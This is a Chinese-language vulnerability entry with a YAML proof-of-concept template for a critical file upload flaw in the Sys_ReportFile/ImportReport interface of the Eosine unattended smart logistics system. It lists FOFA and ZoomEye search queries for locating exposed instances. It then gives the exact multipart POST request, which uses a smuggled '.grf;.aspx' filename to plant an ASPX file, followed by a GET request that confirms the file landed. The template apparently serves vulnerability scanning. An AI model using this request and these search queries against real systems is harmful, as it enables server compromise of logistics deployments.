漏洞描述
易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。易思无人值守智能物流系统Sys_ReportFile接口处存在文件上传漏洞
FOFA: "智能物流无人值守系统"
ZoomEye: app:"易思无人值守智能物流系统"
eosine-sys-reportfile-fileupload: 易思无人值守智能物流系统Sys_ReportFile 文件上传漏洞
PoC代码[已公开]
id: eosine-sys-reportfile-fileupload
info:
name: 易思无人值守智能物流系统Sys_ReportFile 文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |-
易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。易思无人值守智能物流系统Sys_ReportFile接口处存在文件上传漏洞
FOFA: "智能物流无人值守系统"
ZoomEye: app:"易思无人值守智能物流系统"
reference:
- https://mp.weixin.qq.com/s/e1kvv6tv9FP1-s5Oaizpqw
tags: eosine,fileupload
created: 2023/10/31
set:
randName: randomLowercase(6)
randBody: randomLowercase(56)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /Sys_ReportFile/ImportReport?encode={{randName}}
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; .filename=\"1234.grf;.aspx\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n\
{{randBody}}~111\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: true
r1:
request:
method: GET
path: /GRF/Custom/{{randName}}.aspx
expression: response.status == 200 && response.body.bcontains(bytes(randBody))
expression: r0() && r1()